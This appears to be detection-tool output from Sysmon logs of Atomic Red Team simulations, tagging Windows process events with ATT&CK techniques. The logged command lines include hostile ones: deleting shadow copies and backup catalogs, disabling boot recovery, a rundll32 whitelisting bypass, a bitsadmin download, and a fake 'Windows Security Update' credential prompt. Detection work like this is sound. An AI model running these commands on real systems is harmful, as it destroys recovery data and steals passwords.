Microsoft-Windows-Sysmon/Operational
PC01.example.corp
2019-03-19 21:41:17.288
365ABB72-61FD-5C91-0000-0010536A1200
2340
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
C:\Windows\system32\cmd.EXE /c malwr.vbs
C:\Windows\system32\
EXAMPLE\user01
365ABB72-5417-5C91-0000-002035340300
0x33435
1
High
MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-528D-5C91-0000-001062560000
484
C:\Windows\System32\services.exe
C:\Windows\system32\services.exe
",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1563547426.623217,2019-07-19T18:43:46.623217+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (powershell) in event with Command Line (powershell) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe") in directory : ( c:\AtomicRedTeam\ )",1,"
1
5
4
1
0
0x8000000000000000
3574
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:43:03.271
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows PowerShell
Microsoft® Windows® Operating System
Microsoft Corporation
powershell
c:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
747F3D96-D6ED-5D31-0000-0010C88A2500
3764
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1563547426.623217,2019-07-19T18:43:46.623217+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell ),1,"
1
5
4
1
0
0x8000000000000000
3574
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:43:03.271
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows PowerShell
Microsoft® Windows® Operating System
Microsoft Corporation
powershell
c:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
747F3D96-D6ED-5D31-0000-0010C88A2500
3764
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547383.303217,2019-07-19T18:43:03.303217+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
1
5
4
1
0
0x8000000000000000
3573
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:42:53.277
747F3D96-D6ED-5D31-0000-0010C88A2500
3764
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D4B8-5D31-0000-0010A8CE0600
4416
C:\Windows\explorer.exe
C:\Windows\Explorer.EXE
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547710.660877,2019-07-19T18:48:30.660877+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /create AtomicBITS" ),1,"
1
5
4
1
0
0x8000000000000000
3657
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:48:30.619
747F3D96-D83E-5D31-0000-0010F0D02E00
752
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /create AtomicBITS"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1553030551.500169,2019-03-20T01:22:31.500169+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe ) with command line ( "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb )",1,"
1
5
4
1
0
0x8000000000000000
1966541
Microsoft-Windows-Sysmon/Operational
PC01.example.corp
2019-03-19 21:22:28.806
365ABB72-5D94-5C91-0000-001080E90F00
3840
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb
C:\Windows\AppPatch\Custom\
EXAMPLE\user01
365ABB72-5417-5C91-0000-002035340300
0x33435
1
High
MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-543D-5C91-0000-001099A60300
2984
C:\Windows\explorer.exe
C:\Windows\Explorer.EXE
",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1553030551.500169,2019-03-20T01:22:31.500169+04:00,,Threat,High,"Found User (EXAMPLE\user01) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb )",1,"
1
5
4
1
0
0x8000000000000000
1966541
Microsoft-Windows-Sysmon/Operational
PC01.example.corp
2019-03-19 21:22:28.806
365ABB72-5D94-5C91-0000-001080E90F00
3840
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb
C:\Windows\AppPatch\Custom\
EXAMPLE\user01
365ABB72-5417-5C91-0000-002035340300
0x33435
1
High
MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-543D-5C91-0000-001099A60300
2984
C:\Windows\explorer.exe
C:\Windows\Explorer.EXE
",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547710.640915,2019-07-19T18:48:30.640915+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
3656
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:48:05.349
747F3D96-D825-5D31-0000-0010CF222C00
5808
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1553030551.500169,2019-03-20T01:22:31.500169+04:00,,Threat,High,"Found User (EXAMPLE\user01) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb )",1,"
1
5
4
1
0
0x8000000000000000
1966541
Microsoft-Windows-Sysmon/Operational
PC01.example.corp
2019-03-19 21:22:28.806
365ABB72-5D94-5C91-0000-001080E90F00
3840
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb
C:\Windows\AppPatch\Custom\
EXAMPLE\user01
365ABB72-5417-5C91-0000-002035340300
0x33435
1
High
MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-543D-5C91-0000-001099A60300
2984
C:\Windows\explorer.exe
C:\Windows\Explorer.EXE
",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547684.13141,2019-07-19T18:48:04.131410+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1" ),1,"
1
5
4
1
0
0x8000000000000000
3654
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:48:04.094
747F3D96-D824-5D31-0000-001023F42B00
6736
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547684.103366,2019-07-19T18:48:04.103366+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
3653
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:47:57.265
747F3D96-D81D-5D31-0000-0010D7CD2B00
7080
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547677.274199,2019-07-19T18:47:57.274199+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "sdelete.exe C:\some\file.txt" ),1,"
1
5
4
1
0
0x8000000000000000
3652
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:47:57.189
747F3D96-D81D-5D31-0000-0010B8CA2B00
1632
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "sdelete.exe C:\some\file.txt"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547677.227966,2019-07-19T18:47:57.227966+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
3651
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:47:51.972
747F3D96-D817-5D31-0000-0010C8BA2B00
7040
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547672.010791,2019-07-19T18:47:52.010791+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bcdedit.exe /set {default} recoveryenabled no" ),1,"
1
5
4
1
0
0x8000000000000000
3649
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:47:51.899
747F3D96-D817-5D31-0000-001049B42B00
6216
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "bcdedit.exe /set {default} recoveryenabled no"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547671.865963,2019-07-19T18:47:51.865963+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures" ),1,"
1
5
4
1
0
0x8000000000000000
3647
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:47:51.784
747F3D96-D817-5D31-0000-001064AD2B00
6508
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547666.302556,2019-07-19T18:47:46.302556+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
3645
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:47:46.104
747F3D96-D812-5D31-0000-0010AC892B00
2948
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1553037538.288766,2019-03-20T03:18:58.288766+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /c msg * "hello from run key" ),1,"
1
5
4
1
0
0x8000000000000000
1966704
Microsoft-Windows-Sysmon/Operational
PC01.example.corp
2019-03-19 23:18:42.516
365ABB72-78D2-5C91-0000-0010D8A50200
2572
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\cmd.exe" /c msg * "hello from run key"
C:\Windows\system32\
EXAMPLE\user01
365ABB72-77C4-5C91-0000-0020AD7D0100
0x17dad
1
High
MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-785E-5C91-0000-00103FEA0100
1928
C:\Windows\explorer.exe
C:\Windows\Explorer.EXE
",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547665.624944,2019-07-19T18:47:45.624944+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wbadmin.exe delete catalog -quiet" ),1,"
1
5
4
1
0
0x8000000000000000
3641
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:47:45.569
747F3D96-D811-5D31-0000-001000632B00
4500
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "wbadmin.exe delete catalog -quiet"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547665.585327,2019-07-19T18:47:45.585327+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
3640
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:47:40.849
747F3D96-D80C-5D31-0000-001005542B00
1348
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547660.70604,2019-07-19T18:47:40.706040+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "vssadmin.exe delete shadows /all /quiet" ),1,"
1
5
4
1
0
0x8000000000000000
3638
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:47:40.568
747F3D96-D80C-5D31-0000-0010223C2B00
6896
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "vssadmin.exe delete shadows /all /quiet"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547660.691438,2019-07-19T18:47:40.691438+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
3637
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:47:37.170
747F3D96-D809-5D31-0000-001072292B00
980
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547657.127263,2019-07-19T18:47:37.127263+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg" ),1,"
1
5
4
1
0
0x8000000000000000
3633
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:47:37.083
747F3D96-D809-5D31-0000-00100A242B00
3968
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1563547641.972037,2019-07-19T18:47:21.972037+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) running Suspicious PowerShell commands that include (powershell,PromptForCredential,powershell,PromptForCredential) in event with Command Line (powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}) and Parent Image : C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe" /c "powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}") in directory : ( C:\AtomicRedTeam\ )",1,"
1
5
4
1
0
0x8000000000000000
3631
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:46:51.935
747F3D96-D7DB-5D31-0000-0010B5A82A00
4452
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows PowerShell
Microsoft® Windows® Operating System
Microsoft Corporation
powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
747F3D96-D7DB-5D31-0000-001089A52A00
4256
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
